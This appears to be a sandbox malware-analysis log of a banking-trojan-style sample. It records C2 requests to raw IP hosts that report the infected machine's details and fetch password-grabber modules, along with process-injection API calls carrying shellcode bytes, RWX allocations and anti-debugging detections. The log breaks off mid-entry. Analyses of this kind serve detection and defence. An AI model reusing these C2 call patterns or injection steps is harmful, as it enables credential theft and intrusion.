request GET https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabb64/
request GET https://179.189.229.254/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/8uMoLXFfUKElAG6M7lPr/
request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/file/
request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/0/Windows%207%20x64%20SP1/1107/175.208.134.150/727F639DF1E9560A2743CB69221BB85D3D1D1CBDEE638318DB0A9F2C35331CAD/b5Jb57X3TvfZJdxFT53d/
request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/exc/E:%200xc0000005%20A:%200x0000000077919A5A/0/
request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/user/test22/0/
request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/14/NAT%20status/client%20is%20behind%20NAT/0/
request GET https://97.83.40.67/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/10/62/CETDHVSBTPT/7/
request GET https://5.152.175.57/top119/TEST22-PC_W617601.F7F5DEE33983115D7B3F09AF9950BB62/5/pwgrabc64/
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 4096
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x73f02000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 156
region_size: 249856
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02770000
allocation_type: 12289 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtProtectVirtualMemory

process_identifier: 156
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
length: 237568
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x028f1000
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 156
region_size: 16384
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02930000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 156
region_size: 12288
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 156
region_size: 8192
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x10001000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02940000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 156
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02950000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 156
region_size: 180224
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x02960000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0xffffffff
1 0 0

NtAllocateVirtualMemory

process_identifier: 2504
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000001bc0000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffffffffffff
1 0 0
description wermgr.exe tried to sleep 125 seconds, actually delayed analysis time by 125 seconds
domain icanhazip.com
cmdline C:\Windows\system32\cmd.exe
cmdline C:\Windows\system32\svchost.exe
Time & API Arguments Status Return Repeated

NtProtectVirtualMemory

process_identifier: 2748
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
length: 622592
protection: 32 (PAGE_EXECUTE_READ)
base_address: 0x0000000180001000
process_handle: 0x0000000000000114
1 0 0
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

flags: 15
family: 0
111 0
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

system_name:
privilege_name: SeDebugPrivilege
1 1 0
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description Checks if being debugged rule anti_dbg
description Bypass DEP rule disable_dep
Time & API Arguments Status Return Repeated

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1960
process_handle: 0x00000110
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1960
process_handle: 0x00000110
1 0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1864
process_handle: 0x0000000000000428
0 0

NtTerminateProcess

status_code: 0x00000000
process_identifier: 1864
process_handle: 0x0000000000000428
1 0 0
host 104.21.19.200
host 179.189.229.254
host 194.146.249.137
host 5.152.175.57
host 62.99.79.77
host 97.83.40.67
Time & API Arguments Status Return Repeated

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000090000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000000a0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 790528
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000180000000
allocation_type: 8192 (MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x0000000000200000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0

NtAllocateVirtualMemory

process_identifier: 2748
region_size: 4096
stack_dep_bypass: 0
stack_pivoted: 0
heap_dep_bypass: 0
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x00000000001f0000
allocation_type: 12288 (MEM_COMMIT|MEM_RESERVE)
process_handle: 0x0000000000000114
1 0 0
Time & API Arguments Status Return Repeated

WriteProcessMemory

buffer: UAVVWSHƒì`Hl$`HƒäðH‹ùë0H‰‡¨ÇGXH‹OÿW0H‹H‹WA¸ÿÿÿÿE3ÉÿWkGXG‰D$\‹D$\ƒøGuWH‹w`HkFH‰D$PH‹D$PH=˜u\H‹FHL‹V@L‹^8H‹^0L‹N(L‹F H‹NH‹VH‰D$8L‰T$0L‰\$(H‰\$ ëp‹D$\=Ž„Ã3ÀéZÿÿÿH‹D$PH=«uPH‹FPH‹^HL‹V@L‹^8L‹v0L‹N(L‹F H‹NH‹VH‰D$@H‰\$8L‰T$0L‰\$(L‰t$ ÿH‰‡ ¸éóþÿÿHƒ|$PtH‹D$PHƒø9uL‹F H‹NH‹VÿëÌÿëÈH‹D$PHƒøuH‹NÿëµH‹D$PHƒø&…IÿÿÿH‹NH‹VÿëšHLJ¨H‹H‹WE3ÀE3ÉÿWH‹ÿW(HÇH‹OÿW(HÇG3ÉÿW83ÀH‹å[_^A^]ÃÌÌÌÌÌÌUVHƒì(Hl$ HƒäðH‹uPH…öt@H‹EH‹M@H‰VpL‰FxL‰Ž€‹ÉH‰ŽˆH‰†H‰¶˜H‹NÿV0H‹NºÿÿÿÿÿV He^]Ã
base_address: 0x0000000000090000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: H¹ H¸ ÿà
base_address: 0x00000000ff42246c
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: VERSION.dll
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: €o!w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: GetFileVersionInfoA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"wìüþ
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: VerQueryValueA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"wìüþ
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: GetFileVersionInfoSizeA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"wìüþ
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: KERNEL32.dll
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: €o!w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: GetLastError
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: HeapFree
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: HeapSize
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: HeapReAlloc
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: HeapAlloc
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: GetProcessHeap
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: lstrlenA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: lstrcpyA
base_address: 0x00000000001f0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: 6"w w
base_address: 0x0000000000200000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer:  ,'w +"w€/"w Ù wð@’wÀ/•w0•w’w 
base_address: 0x00000000000a0000
process_identifier: 2748
process_handle: 0x0000000000000114
1 1 0

WriteProcessMemory

buffer: EnterCriticalSection
base_address: 0x00000000001f0000
process_identifier: 2748
